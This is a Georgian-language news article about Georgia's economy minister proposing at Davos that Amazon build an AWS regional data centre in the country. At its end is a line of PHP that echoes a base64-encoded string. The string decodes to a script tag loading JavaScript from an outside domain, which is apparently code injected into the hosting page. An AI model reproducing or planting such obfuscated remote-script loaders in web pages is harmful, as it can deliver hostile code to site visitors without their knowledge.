celsiusi
ავერსი საქკაბელი

მსოფლიოს უმსხვილეს ონლაინ-სავაჭრო პლატფორმა „ამაზონს“ შევთავაზეთ, რომ განიხილონ შესაძლებლობა საქართველოში „ამაზონის“ ვებსერვისების (AWS) რეგიონული მონაცემთა ცენტრის მოწყობისთვის, – ამის შესახებ ვიცე-პრემიერმა, საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრმა კომპანია „ამაზონის“ ვიცე-პრეზიდენტთან შეხვედრის დასრულების შემდეგ განაცხადა.

ლევან დავითაშვილმა და მაიკლ ფუნკემ ურთიერთთანამშრომლობის მნიშვნელოვანი საკითხები დავოსში განიხილეს, სადაც საქართველოს დელეგაცია, პრემიერ-მინისტრის ხელმძღვანელობით, მსოფლიო ეკონომიკურ ფორუმზე იმყოფება.
ლევან დავითაშვილის ინფორმაციით, იმ მნიშვნელოვან საკითხებს შორის, რაზეც „ამაზონის“ ვიცე-პრეზიდენტთან ისაუბრა, არის საქართველოში ციფრული ეკონომიკის განვითარების მიმართულებით განხორციელებული და მიმდინარე რეფორმები, ელექტრონული კომუნიკაციების ბაზარზე არსებული მდგომარეობა, ციფრული ტრანსფორმაციის, ციფრული ეკონომიკისა და საინფორმაციო საზოგადოების განვითარება, სამინისტროს პრიორიტეტები და საქართველოში ციფრული მიმართულებით არსებული საკანონმდებლო გარემო, რომელიც ევროკავშირის რეგულაციებთან მაქსიმალურად არის დაახლოებული და ამ მიმართულებით მუშაობა აქტიურად გრძელდება.
„ჩვენი შეთავაზებაა, რომ „ამაზონმა“ საქართველო განიხილოს როგორც მონაცემთა გაცვლის ერთ-ერთი ჰაბი და შეისწავლოს საქართველოში დატა-ცენტრის შექმნის შესაძლებლობა. ასევე ვისაუბრეთ თანამშრომლობის სხვა მიმართულებებზე, მათ შორის ციფრულ ტრანსფორმაციაში „ამაზონის“ დახმარებაზე საქართველოს ხელისუფლების მიმართ, კადრების მომზადებისა და სხვა მნიშვნელოვან საკითხებზე“ – აღნიშნა ეკონომიკის მინისტრმა.
მისივე განცხადებით, საქართველოში საინფორმაციო და საკომუნიკაციო ტექნოლოგიების (ICT) კომპანიებისთვის არსებობს მიმზიდველი ბიზნესგარემო, საგადასახადო სისტემა, ხელსაყრელი სავაჭრო რეჟიმები, თავისუფალი ინდუსტრიული ზონები და იაფი ელექტროენერგია, რაც კარგად განვითარებულ საერთაშორისო ფართოზოლოვან და შიდა ინტერნეტკავშირებთან ერთად მნიშვნელოვანია და საქართველოს მიმზიდველ ადგილად აქცევს ტექნოლოგიური გიგანტების მონაცემთა გაცვლის ცენტრების შესაქმნელად.

1525
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");